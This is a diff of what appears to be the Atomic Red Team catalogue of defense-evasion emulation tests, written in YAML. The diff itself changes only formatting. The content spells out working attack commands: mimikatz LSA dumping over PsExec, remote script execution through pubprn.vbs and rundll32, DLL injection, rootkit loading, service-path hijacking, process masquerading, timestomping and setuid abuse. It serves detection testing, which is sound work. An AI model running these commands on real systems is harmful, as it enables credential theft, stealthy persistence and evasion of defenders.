@@ -34469,10 +34469,10 @@ defense-evasion: - description: 'PsExec tool from Sysinternals must exist on disk at specified location (#{psexec_path}) - ' +' prereq_command: 'if (Test-Path "#{psexec_path}") { exit 0} else { exit 1} - ' +' get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PsTools.zip" @@ -34483,7 +34483,7 @@ defense-evasion: command: '#{psexec_path} /accepteula \\#{machine} -c #{mimikatz_path} "lsadump::lsa /inject /id:500" "exit" - ' +' name: command_prompt elevation_required: false T1055.008: @@ -34618,7 +34618,7 @@ defense-evasion: description: 'Executes the signed PubPrn.vbs script with options to download and execute an arbitrary payload. - ' +' supported_platforms: - windows input_arguments: @@ -34630,7 +34630,7 @@ defense-evasion: command: 'cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost "script:#{remote_payload}" - ' +' name: command_prompt T1542.004: technique: @@ -34853,7 +34853,7 @@ defense-evasion: description: 'Executes the Uninstall Method, No Admin Rights Required. Upon execution, "I shouldn''t really execute either." will be displayed. - ' +' supported_platforms: - windows input_arguments: @@ -34870,10 +34870,10 @@ defense-evasion: - description: 'The CSharp source file must exist on disk at specified location (#{source_file}) - ' +' prereq_command: 'if (Test-Path #{source_file}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{source_file}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.009/src/T1218.009.cs" -OutFile "#{source_file}" @@ -34883,7 +34883,7 @@ defense-evasion: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U #{output_file} cleanup_command: 'del #{output_file} >nul 2>&1 - ' +' name: command_prompt - name: Regsvcs Uninstall Method Call Test auto_generated_guid: fd3c1c6a-02d2-4b72-82d9-71c527abb126 @@ -34906,10 +34906,10 @@ defense-evasion: - description: 'The CSharp source file must exist on disk at specified location (#{source_file}) - ' +' prereq_command: 'if (Test-Path #{source_file}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{source_file}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.009/src/T1218.009.cs" -OutFile "#{source_file}" @@ -34998,7 +34998,7 @@ defense-evasion: description: 'Regsvr32.exe is a command-line program used to register and unregister OLE controls. Upon execution, calc.exe will be launched. - ' +' supported_platforms: - windows input_arguments: @@ -35018,10 +35018,10 @@ defense-evasion: dependencies: - description: 'Regsvr32.sct must exist on disk at specified location (#{filename}) - ' +' prereq_command: 'if (Test-Path #{filename}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{filename}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.010/src/RegSvr32.sct" -OutFile "#{filename}" @@ -35056,7 +35056,7 @@ defense-evasion: description: 'Regsvr32.exe is a command-line program used to register and unregister OLE controls. Upon execution, calc.exe will be launched. - ' +' supported_platforms: - windows input_arguments: @@ -35077,10 +35077,10 @@ defense-evasion: - description: 'AllTheThingsx86.dll must exist on disk at specified location (#{dll_name}) - ' +' prereq_command: 'if (Test-Path #{dll_name}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{dll_name}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.010/bin/AllTheThingsx86.dll" -OutFile "#{dll_name}" @@ -35088,14 +35088,14 @@ defense-evasion: command: 'IF "%PROCESSOR_ARCHITECTURE%"=="AMD64" (C:\Windows\syswow64\regsvr32.exe /s #{dll_name}) ELSE ( #{regsvr32path}\#{regsvr32name} /s #{dll_name} ) - ' +' name: command_prompt - name: Regsvr32 Registering Non DLL auto_generated_guid: 1ae5ea1f-0a4e-4e54-b2f5-4ac328a7f421 description: 'Replicating observed Gozi maldoc behavior registering a dll with an altered extension - ' +' supported_platforms: - windows input_arguments: @@ -35115,13 +35115,13 @@ defense-evasion: dependencies: - description: 'Test requires a renamed dll file - ' +' prereq_command: 'if exist #{dll_file} ( exit 0 ) else ( exit 1 ) - ' +' get_prereq_command: 'copy "C:\Windows\System32\shell32.dll" "#{dll_file}" - ' +' executor: name: command_prompt elevation_required: false @@ -35237,7 +35237,7 @@ defense-evasion: %SystemRoot%\Temp\lsass.exe /B cleanup_command: 'del /Q /F %SystemRoot%\Temp\lsass.exe >nul 2>&1 - ' +' name: command_prompt - name: Masquerading as Linux crond process. auto_generated_guid: a315bfff-7a98-403b-b442-2ea1b255e556 @@ -35253,7 +35253,7 @@ defense-evasion: echo 'sleep 5' | /tmp/crond cleanup_command: 'rm /tmp/crond - ' +' name: sh - name: Masquerading - cscript.exe running as notepad.exe auto_generated_guid: 3a2a578b-0a01-46e4-92e3-62e2859b42f0 @@ -35269,7 +35269,7 @@ defense-evasion: cmd.exe /c %APPDATA%\notepad.exe /B cleanup_command: 'del /Q /F %APPDATA%\notepad.exe >nul 2>&1 - ' +' name: command_prompt - name: Masquerading - wscript.exe running as svchost.exe auto_generated_guid: 24136435-c91a-4ede-9da1-8b284a1c1a23 @@ -35285,7 +35285,7 @@ defense-evasion: cmd.exe /c %APPDATA%\svchost.exe /B cleanup_command: 'del /Q /F %APPDATA%\svchost.exe >nul 2>&1 - ' +' name: command_prompt - name: Masquerading - powershell.exe running as taskhostw.exe auto_generated_guid: ac9d0fc3-8aa8-4ab5-b11f-682cd63b40aa @@ -35301,7 +35301,7 @@ defense-evasion: cmd.exe /K %APPDATA%\taskhostw.exe cleanup_command: 'del /Q /F %APPDATA%\taskhostw.exe >nul 2>&1 - ' +' name: command_prompt - name: Masquerading - non-windows exe running as windows exe auto_generated_guid: bc15c13f-d121-4b1f-8c7d-28d95854d086 @@ -35324,10 +35324,10 @@ defense-evasion: dependencies: - description: 'Exe file to copy must exist on disk at specified location (#{inputfile}) - ' +' prereq_command: 'if (Test-Path #{inputfile}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{inputfile}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1036.003/bin/T1036.003.exe" -OutFile "#{inputfile}" @@ -35338,14 +35338,14 @@ defense-evasion: Stop-Process -ID $myT1036_003 cleanup_command: 'Remove-Item #{outputfile} -Force -ErrorAction Ignore - ' +' name: powershell - name: Masquerading - windows exe running as different windows exe auto_generated_guid: c3d24a39-2bfe-4c6a-b064-90cd73896cb0 description: 'Copies a windows exe, renames it as another windows exe, and launches it to masquerade as second windows exe - ' +' supported_platforms: - windows input_arguments: @@ -35364,7 +35364,7 @@ defense-evasion: Stop-Process -ID $myT1036_003 cleanup_command: 'Remove-Item #{outputfile} -Force -ErrorAction Ignore - ' +' name: powershell - name: Malicious process Masquerading as LSM.exe auto_generated_guid: 83810c46-f45e-4485-9ab6-8ed0e9e6ed7f @@ -35646,7 +35646,7 @@ defense-evasion: - description: 'Mimikatz executor must exist on disk and at specified location (#{mimikatz_path}) - ' +' prereq_command: | $mimikatz_path = cmd /c echo #{mimikatz_path} if (Test-Path $mimikatz_path) {exit 0} else {exit 1} @@ -35660,10 +35660,10 @@ defense-evasion: - description: 'PsExec tool from Sysinternals must exist on disk at specified location (#{psexec_path}) - ' +' prereq_command: 'if (Test-Path "#{psexec_path}") { exit 0} else { exit 1} - ' +' get_prereq_command: | Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PsTools.zip" Expand-Archive $env:TEMP\PsTools.zip $env:TEMP\PsTools -Force @@ -35696,7 +35696,7 @@ defense-evasion: Write-Host "End of DCShadow" cleanup_command: 'Stop-Process -Name "mimikatz" -Force -ErrorAction Ignore - ' +' T1014: technique: id: attack-pattern--0f20e3cb-245b-4a61-8a91-2d93f7cb0e9b @@ -35774,7 +35774,7 @@ defense-evasion: auto_generated_guid: dfb50072-e45a-4c75-a17e-a484809c8553 description: 'Loadable Kernel Module based Rootkit - ' +' supported_platforms: - linux input_arguments: @@ -35799,10 +35799,10 @@ defense-evasion: dependencies: - description: 'The kernel module must exist on disk at specified location (#{rootkit_path}) - ' +' prereq_command: 'if [ -f #{rootkit_path} ]; then exit 0; else exit 1; fi; - ' +' get_prereq_command: | if [ ! -d #{temp_folder} ]; then mkdir #{temp_folder}; touch #{temp_folder}/safe_to_delete; fi; cp #{rootkit_source_path}/* #{temp_folder}/ @@ -35812,17 +35812,17 @@ defense-evasion: executor: command: 'sudo insmod #{rootkit_path} - ' +' cleanup_command: 'sudo rmmod #{rootkit_name} - ' +' name: sh elevation_required: true - name: Loadable Kernel Module based Rootkit auto_generated_guid: 75483ef8-f10f-444a-bf02-62eb0e48db6f description: 'Loadable Kernel Module based Rootkit - ' +' supported_platforms: - linux input_arguments: @@ -35847,11 +35847,11 @@ defense-evasion: dependencies: - description: 'The kernel module must exist on disk at specified location (#{rootkit_path}) - ' +' prereq_command: 'if [ -f /lib/modules/$(uname -r)/#{rootkit_name}.ko ]; then exit 0; else exit 1; fi; - ' +' get_prereq_command: "if [ ! -d #{temp_folder} ]; then mkdir #{temp_folder}; touch #{temp_folder}/safe_to_delete; fi;\ncp #{rootkit_source_path}/* #{temp_folder}/\ncd #{temp_folder}; make \nsudo cp #{temp_folder}/#{rootkit_name}.ko @@ -35860,7 +35860,7 @@ defense-evasion: executor: command: 'sudo modprobe #{rootkit_name} - ' +' cleanup_command: | sudo modprobe -r #{rootkit_name} sudo rm /lib/modules/$(uname -r)/#{rootkit_name}.ko @@ -35990,7 +35990,7 @@ defense-evasion: description: 'Test execution of a remote script using rundll32.exe. Upon execution notepad.exe will be opened. - ' +' supported_platforms: - windows input_arguments: @@ -36001,7 +36001,7 @@ defense-evasion: executor: command: 'rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:#{file_url}").Exec(); - ' +' name: command_prompt - name: Rundll32 execute VBscript command auto_generated_guid: 638730e7-7aed-43dc-bf8c-8117f805f5bb @@ -36019,7 +36019,7 @@ defense-evasion: executor: command: 'rundll32 vbscript:"\..\mshtml,RunHTMLApplication "+String(CreateObject("WScript.Shell").Run("#{command_to_execute}"),0) - ' +' name: command_prompt - name: Rundll32 advpack.dll Execution auto_generated_guid: d91cae26-7fc1-457b-a854-34c8aad48c89 @@ -36038,17 +36038,17 @@ defense-evasion: dependencies: - description: 'Inf file must exist on disk at specified location (#{inf_to_execute}) - ' +' prereq_command: 'if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{inf_to_execute}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.011/src/T1218.011.inf" -OutFile "#{inf_to_execute}" executor: command: 'rundll32.exe advpack.dll,LaunchINFSection #{inf_to_execute},DefaultInstall_SingleUser,1, - ' +' name: command_prompt - name: Rundll32 ieadvpack.dll Execution auto_generated_guid: 5e46a58e-cbf6-45ef-a289-ed7754603df9 @@ -36068,17 +36068,17 @@ defense-evasion: dependencies: - description: 'Inf file must exist on disk at specified location (#{inf_to_execute}) - ' +' prereq_command: 'if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{inf_to_execute}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.011/src/T1218.011.inf" -OutFile "#{inf_to_execute}" executor: command: 'rundll32.exe ieadvpack.dll,LaunchINFSection #{inf_to_execute},DefaultInstall_SingleUser,1, - ' +' name: command_prompt - name: Rundll32 syssetup.dll Execution auto_generated_guid: 41fa324a-3946-401e-bbdd-d7991c628125 @@ -36097,10 +36097,10 @@ defense-evasion: dependencies: - description: 'Inf file must exist on disk at specified location (#{inf_to_execute}) - ' +' prereq_command: 'if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{inf_to_execute}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.011/src/T1218.011_DefaultInstall.inf" -OutFile "#{inf_to_execute}" @@ -36108,7 +36108,7 @@ defense-evasion: command: 'rundll32.exe syssetup.dll,SetupInfObjectInstallAction DefaultInstall 128 .\#{inf_to_execute} - ' +' name: command_prompt - name: Rundll32 setupapi.dll Execution auto_generated_guid: 71d771cd-d6b3-4f34-bc76-a63d47a10b19 @@ -36127,10 +36127,10 @@ defense-evasion: dependencies: - description: 'Inf file must exist on disk at specified location (#{inf_to_execute}) - ' +' prereq_command: 'if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{inf_to_execute}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.011/src/T1218.011_DefaultInstall.inf" -OutFile "#{inf_to_execute}" @@ -36138,7 +36138,7 @@ defense-evasion: command: 'rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 .\#{inf_to_execute} - ' +' name: command_prompt - name: Execution of HTA and VBS Files using Rundll32 and URL.dll auto_generated_guid: 22cfde89-befe-4e15-9753-47306b37a6e3 @@ -36161,7 +36161,7 @@ defense-evasion: description: 'Executes the LaunchApplication function in pcwutl.dll to proxy execution of an executable. - ' +' supported_platforms: - windows input_arguments: @@ -36172,7 +36172,7 @@ defense-evasion: executor: command: 'rundll32.exe pcwutl.dll,LaunchApplication #{exe_to_launch} - ' +' name: command_prompt T1134.005: technique: @@ -36571,7 +36571,7 @@ defense-evasion: description: 'Change Service registry ImagePath of a bengin service to a malicious file - ' +' supported_platforms: - windows input_arguments: @@ -36591,22 +36591,22 @@ defense-evasion: dependencies: - description: 'The service must exist (#{weak_service_name}) - ' +' prereq_command: 'if (Get-Service #{weak_service_name}) {exit 0} else {exit 1} - ' +' get_prereq_command: 'sc.exe create #{weak_service_name} binpath= "#{weak_service_path}" - ' +' executor: command: 'reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name}" /f /v ImagePath /d "#{malicious_service_path}" - ' +' cleanup_command: 'sc.exe delete #{weak_service_name} - ' +' name: command_prompt T1548.001: technique: @@ -36662,7 +36662,7 @@ defense-evasion: description: 'Make, change owner, and change file attributes on a C source code file - ' +' supported_platforms: - macos - linux @@ -36688,7 +36688,7 @@ defense-evasion: auto_generated_guid: 759055b3-3885-4582-a8ec-c00c9d64dd79 description: 'This test sets the SetUID flag on a file in Linux and macOS. - ' +' supported_platforms: - macos - linux @@ -36704,14 +36704,14 @@ defense-evasion: sudo chmod u+s #{file_to_setuid} cleanup_command: 'sudo rm #{file_to_setuid} - ' +' name: sh elevation_required: true - name: Set a SetGID flag on file auto_generated_guid: db55f666-7cba-46c6-9fe6-205a05c3242c description: 'This test sets the SetGID flag on a file in Linux and macOS. - ' +' supported_platforms: - macos - linux @@ -36727,7 +36727,7 @@ defense-evasion: sudo chmod g+s #{file_to_setuid} cleanup_command: 'sudo rm #{file_to_setuid} - ' +' name: sh elevation_required: true - name: Make and modify capabilities of a binary @@ -36759,7 +36759,7 @@ defense-evasion: description: 'This test gives a file the capability to set UID without using flags. - ' +' supported_platforms: - linux input_arguments: @@ -36773,7 +36773,7 @@ defense-evasion: sudo setcap cap_setuid=ep #{file_to_setcap} cleanup_command: 'rm #{file_to_setcap} - ' +' name: sh elevation_required: true T1218: @@ -36832,7 +36832,7 @@ defense-evasion: description: 'Injects arbitrary DLL into running process specified by process ID. Requires Windows 10. - ' +' supported_platforms: - windows input_arguments: @@ -36848,17 +36848,17 @@ defense-evasion: dependencies: - description: 'T1218.dll must exist on disk at specified location (#{dll_payload}) - ' +' prereq_command: 'if (Test-Path #{dll_payload}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{dll_payload}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/x64/T1218.dll" -OutFile "#{dll_payload}" executor: command: 'mavinject.exe #{process_id} /INJECTRUNNING #{dll_payload} - ' +' name: command_prompt elevation_required: true - name: SyncAppvPublishingServer - Execute arbitrary PowerShell code @@ -36866,7 +36866,7 @@ defense-evasion: description: 'Executes arbitrary PowerShell code using SyncAppvPublishingServer.exe. Requires Windows 10. - ' +' supported_platforms: - windows input_arguments: @@ -36877,14 +36877,14 @@ defense-evasion: executor: command: 'SyncAppvPublishingServer.exe "n; #{powershell_code}" - ' +' name: command_prompt - name: Register-CimProvider - Execute evil dll auto_generated_guid: ad2c17ed-f626-4061-b21e-b9804a6f3655 description: 'Execute arbitrary dll. Requires at least Windows 8/2012. Also note this dll can be served up via SMB - ' +' supported_platforms: - windows input_arguments: @@ -36896,17 +36896,17 @@ defense-evasion: dependencies: - description: 'T1218-2.dll must exist on disk at specified location (#{dll_payload}) - ' +' prereq_command: 'if (Test-Path #{dll_payload}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{dll_payload}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/Win32/T1218-2.dll" -OutFile "#{dll_payload}" executor: command: 'C:\Windows\SysWow64\Register-CimProvider.exe -Path #{dll_payload} - ' +' name: command_prompt - name: InfDefaultInstall.exe .inf Execution auto_generated_guid: 54ad7d5a-a1b5-472c-b6c4-f8090fb2daef @@ -36925,17 +36925,17 @@ defense-evasion: dependencies: - description: 'INF file must exist on disk at specified location (#{inf_to_execute}) - ' +' prereq_command: 'if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{inf_to_execute}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/Infdefaultinstall.inf" -OutFile "#{inf_to_execute}" executor: command: 'InfDefaultInstall.exe #{inf_to_execute} - ' +' name: command_prompt - name: ProtocolHandler.exe Downloaded a Suspicious File auto_generated_guid: db020456-125b-4c8b-a4a7-487df8afb5a2 @@ -36943,7 +36943,7 @@ defense-evasion: Office. On successful execution you should see Microsoft Word launch a blank file. - ' +' supported_platforms: - windows input_arguments: @@ -36956,15 +36956,15 @@ defense-evasion: - description: 'Microsoft Word must be installed with the correct path and protocolhandler.exe must be provided - ' +' prereq_command: 'if (Test-Path "(Resolve-Path "C:\Program Files*\Microsoft Office\root\Office16")\protocolhandler.exe") {exit 0} else {exit 1} - ' +' get_prereq_command: 'write-host "Install Microsoft Word or provide correct path." - ' +' executor: name: command_prompt elevation_required: false @@ -36976,7 +36976,7 @@ defense-evasion: description: 'Emulates attack with Microsoft.Workflow.Compiler.exe running a .Net assembly that launches calc.exe - ' +' supported_platforms: - windows input_arguments: @@ -36998,15 +36998,15 @@ defense-evasion: prereq_command: 'if (Test-Path #{mwcpath}\#{mwcname} ) {exit 0} else {exit 1} - ' +' get_prereq_command: 'write-host ".Net must be installed for this test to work correctly." - ' +' executor: command: '#{mwcpath}\#{mwcname} "#{xml_payload}" output.txt - ' +' name: powershell elevation_required: false - name: Renamed Microsoft.Workflow.Compiler.exe Payload Executions @@ -37014,7 +37014,7 @@ defense-evasion: description: 'Emulates attack with a renamed Microsoft.Workflow.Compiler.exe running a .Net assembly that launches calc.exe - ' +' supported_platforms: - windows input_arguments: @@ -37043,7 +37043,7 @@ defense-evasion: get_prereq_command: 'write-host "you need to rename workflow complier before you run this test" - ' +' executor: command: "#{renamed_binary} #{xml_payload} output.txt\n" name: powershell @@ -37086,7 +37086,7 @@ defense-evasion: get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force - ' +' executor: command: 'Invoke-ATHRemoteFXvGPUDisablementCommand -ModuleName #{module_name} -ModulePath #{module_path}' @@ -37153,14 +37153,14 @@ defense-evasion: executor: command: 'C:\windows\system32\SyncAppvPublishingServer.vbs "\n;#{command_to_execute}" - ' +' name: command_prompt - name: manage-bde.wsf Signed Script Command Execution auto_generated_guid: 2a8f2d3c-3dec-4262-99dd-150cb2a4d63a description: 'Executes the signed manage-bde.wsf script with options to execute an arbitrary command. - ' +' supported_platforms: - windows input_arguments: @@ -37174,7 +37174,7 @@ defense-evasion: cscript %windir%\System32\manage-bde.wsf cleanup_command: 'set comspec=%windir%\System32\cmd.exe - ' +' name: command_prompt T1027.002: technique: @@ -37250,10 +37250,10 @@ defense-evasion: executor: command: 'cp #{bin_path} /tmp/packed_bin && /tmp/packed_bin - ' +' cleanup_command: 'rm /tmp/packed_bin - ' +' name: sh - name: Binary packed by UPX, with modified headers (linux) auto_generated_guid: f06197f8-ff46-48c2-a0c6-afc1b50665e1 @@ -37272,10 +37272,10 @@ defense-evasion: executor: command: 'cp #{bin_path} /tmp/packed_bin && /tmp/packed_bin - ' +' cleanup_command: 'rm /tmp/packed_bin - ' +' name: sh - name: Binary simply packed by UPX auto_generated_guid: b16ef901-00bb-4dda-b4fc-a04db5067e20 @@ -37292,10 +37292,10 @@ defense-evasion: executor: command: 'cp #{bin_path} /tmp/packed_bin && /tmp/packed_bin - ' +' cleanup_command: 'rm /tmp/packed_bin - ' +' name: sh - name: Binary packed by UPX, with modified headers auto_generated_guid: 4d46e16b-5765-4046-9f25-a600d3e65e4d @@ -37314,10 +37314,10 @@ defense-evasion: executor: command: 'cp #{bin_path} /tmp/packed_bin && /tmp/packed_bin - ' +' cleanup_command: 'rm /tmp/packed_bin - ' +' name: sh T1036.006: technique: @@ -37371,7 +37371,7 @@ defense-evasion: auto_generated_guid: 89a7dd26-e510-4c9f-9b15-f3bae333360f description: 'Space After Filename - ' +' supported_platforms: - macos executor: @@ -37383,7 +37383,7 @@ defense-evasion: auto_generated_guid: b95ce2eb-a093-4cd8-938d-5258cef656ea description: 'Space after filename. - ' +' supported_platforms: - macos - linux @@ -37605,7 +37605,7 @@ defense-evasion: auto_generated_guid: 150c3a08-ee6e-48a6-aeaf-3659d24ceb4e description: 'Common Sudo enumeration methods. - ' +' supported_platforms: - macos - linux @@ -37619,7 +37619,7 @@ defense-evasion: This is dangerous to modify without using ''visudo'', do not do this on a production system. - ' +' supported_platforms: - macos - linux @@ -37634,7 +37634,7 @@ defense-evasion: description: 'Sets sudo caching tty_tickets value to disabled. This is dangerous to modify without using ''visudo'', do not do this on a production system. - ' +' supported_platforms: - macos - linux @@ -37744,7 +37744,7 @@ defense-evasion: | grep -iE ''Oracle|VirtualBox|VMWare|Parallels'') then echo "Virtualization Environment detected"; fi; - ' +' - name: Detect Virtualization Environment (Windows) auto_generated_guid: 502a7dc4-9d6f-4d28-abf2-f0e84692562d description: 'Windows Management Instrumentation(WMI) objects contains system @@ -37754,7 +37754,7 @@ defense-evasion: This is meant to find the result of Not supported, which is the result if run in a virtual machine - ' +' supported_platforms: - windows executor: @@ -37771,7 +37771,7 @@ defense-evasion: the system. If it''s a virtual machine, one of the device manufacturer will be a Virtualization Software. - ' +' supported_platforms: - macos executor: @@ -37781,7 +37781,7 @@ defense-evasion: ''Oracle|VirtualBox|VMWare|Parallels'') then echo ''Virtualization Environment detected''; fi; - ' +' - name: Detect Virtualization Environment via WMI Manufacturer/Model Listing (Windows) auto_generated_guid: 4a41089a-48e0-47aa-82cb-5b81a463bc78 description: "Windows Management Instrumentation(WMI) objects contain system @@ -38036,7 +38036,7 @@ defense-evasion: executor: command: 'start #{docx_file} - ' +' name: command_prompt T1055.003: technique: @@ -38279,7 +38279,7 @@ defense-evasion: auto_generated_guid: 5f9113d5-ed75-47ed-ba23-ea3573d05810 description: 'Stomps on the access timestamp of a file - ' +' supported_platforms: - linux - macos @@ -38291,13 +38291,13 @@ defense-evasion: executor: command: 'touch -a -t 197001010000.00 #{target_filename} - ' +' name: sh - name: Set a file's modification timestamp auto_generated_guid: 20ef1523-8758-4898-b5a2-d026cc3d2c52 description: 'Stomps on the modification timestamp of a file - ' +' supported_platforms: - linux - macos @@ -38309,7 +38309,7 @@ defense-evasion: executor: command: 'touch -m -t 197001010000.00 #{target_filename} - ' +' name: sh - name: Set a file's creation timestamp auto_generated_guid: 8164a4a6-f99c-4661-ac4f-80f5e4e78d2b @@ -38355,7 +38355,7 @@ defense-evasion: executor: command: 'touch -acmr #{reference_file_path} #{target_file_path} - ' +' name: sh - name: Windows - Modify file creation timestamp with PowerShell auto_generated_guid: b3b2c408-2ff0-4a33-b89b-1cb46a9e6a9c @@ -38378,10 +38378,10 @@ defense-evasion: - description: 'A file must exist at the path (#{file_path}) to change the creation time on - ' +' prereq_command: 'if (Test-Path #{file_path}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Path #{file_path} -Force | Out-Null Set-Content #{file_path} -Value "T1551.006 Timestomp" -Force | Out-Null @@ -38389,10 +38389,10 @@ defense-evasion: command: 'Get-ChildItem #{file_path} | % { $_.CreationTime = "#{target_date_time}" } - ' +' cleanup_command: 'Remove-Item #{file_path} -Force -ErrorAction Ignore - ' +' name: powershell - name: Windows - Modify file last modified timestamp with PowerShell auto_generated_guid: f8f6634d-93e1-4238-8510-f8a90a20dcf2 @@ -38415,10 +38415,10 @@ defense-evasion: - description: 'A file must exist at the path (#{file_path}) to change the modified time on - ' +' prereq_command: 'if (Test-Path #{file_path}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Path #{file_path} -Force | Out-Null Set-Content #{file_path} -Value "T1551.006 Timestomp" -Force | Out-Null @@ -38426,10 +38426,10 @@ defense-evasion: command: 'Get-ChildItem #{file_path} | % { $_.LastWriteTime = "#{target_date_time}" } - ' +' cleanup_command: 'Remove-Item #{file_path} -Force -ErrorAction Ignore - ' +' name: powershell - name: Windows - Modify file last access timestamp with PowerShell auto_generated_guid: da627f63-b9bd-4431-b6f8-c5b44d061a62 @@ -38452,10 +38452,10 @@ defense-evasion: - description: 'A file must exist at the path (#{file_path}) to change the last access time on - ' +' prereq_command: 'if (Test-Path #{file_path}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Path #{file_path} -Force | Out-Null Set-Content #{file_path} -Value "T1551.006 Timestomp" -Force | Out-Null @@ -38463,10 +38463,10 @@ defense-evasion: command: 'Get-ChildItem #{file_path} | % { $_.LastAccessTime = "#{target_date_time}" } - ' +' cleanup_command: 'Remove-Item #{file_path} -Force -ErrorAction Ignore - ' +' name: powershell - name: Windows - Timestomp a File auto_generated_guid: d7512c33-3a75-4806-9893-69abc3ccdd43 @@ -38484,25 +38484,25 @@ defense-evasion: dependencies: - description: 'timestomp.ps1 must be present in #{file_path}. - ' +' prereq_command: 'if (Test-Path #{file_path}\timestomp.ps1) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Invoke-WebRequest "https://raw.githubusercontent.com/mitre-attack/attack-arsenal/bc0ba1d88d026396939b6816de608cb279bfd489/adversary_emulation/APT29/CALDERA_DIY/evals/payloads/timestomp.ps1" -OutFile "#{file_path}\timestomp.ps1" - ' +' - description: 'kxwn.lock must be present in #{file_path}. - ' +' prereq_command: 'if (Test-Path -path "#{file_path}\kxwn.lock") {exit 0} else {exit 1} - ' +' get_prereq_command: 'New-Item -Path #{file_path}\kxwn.lock -ItemType File - ' +' executor: command: | import-module #{file_path}\timestomp.ps1 @@ -39476,10 +39476,10 @@ defense-evasion: - description: 'Test requrires a file to take ownership of to be located at (#{file_folder_to_own}) - ' +' prereq_command: 'IF EXIST #{file_folder_to_own} ( EXIT 0 ) ELSE ( EXIT 1 ) - ' +' get_prereq_command: | mkdir #{file_folder_to_own} echo T1222.001_takeown1 >> #{file_folder_to_own}\T1222.001_takeown1.txt @@ -39487,7 +39487,7 @@ defense-evasion: executor: command: 'takeown.exe /f #{file_folder_to_own} /r - ' +' name: command_prompt - name: cacls - Grant permission to specified user or group recursively auto_generated_guid: a8206bcc-f282-40a9-a389-05d9c0263485 @@ -39510,10 +39510,10 @@ defense-evasion: dependencies: - description: 'Test requrires a file to modify to be located at (#{file_or_folder}) - ' +' prereq_command: 'IF EXIST #{file_or_folder} ( EXIT 0 ) ELSE ( EXIT 1 ) - ' +' get_prereq_command: | mkdir #{file_or_folder} echo T1222.001_cacls1 >> #{file_or_folder}\T1222.001_cacls1.txt @@ -39521,7 +39521,7 @@ defense-evasion: executor: command: 'icacls.exe #{file_or_folder} /grant #{user_or_group}:F - ' +' name: command_prompt - name: attrib - Remove read-only attribute auto_generated_guid: bec1e95c-83aa-492e-ab77-60c71bbd21b0 @@ -39539,10 +39539,10 @@ defense-evasion: dependencies: - description: 'Test requrires a file to modify to be located at (#{file_or_folder}) - ' +' prereq_command: 'IF EXIST #{file_or_folder} ( EXIT 0 ) ELSE ( EXIT 1 ) - ' +' get_prereq_command: | mkdir #{file_or_folder} echo T1222.001_attrib1 >> #{file_or_folder}\T1222.001_attrib1.txt @@ -39552,7 +39552,7 @@ defense-evasion: executor: command: 'attrib.exe -r #{file_or_folder}\*.* /s - ' +' name: command_prompt - name: attrib - hide file auto_generated_guid: 32b979da-7b68-42c9-9a99-0e39900fc36c @@ -39575,7 +39575,7 @@ defense-evasion: attrib.exe +h #{file_or_folder}\T1222.001_attrib2.txt cleanup_command: 'del /A:H #{file_or_folder}\T1222.001_attrib*.txt >nul 2>&1 - ' +' name: command_prompt - name: Grant Full Access to folder for Everyone - Ryuk Ransomware Style auto_generated_guid: ac7e6118-473d-41ec-9ac0-ef4f1d1ed2f6 @@ -39600,18 +39600,18 @@ 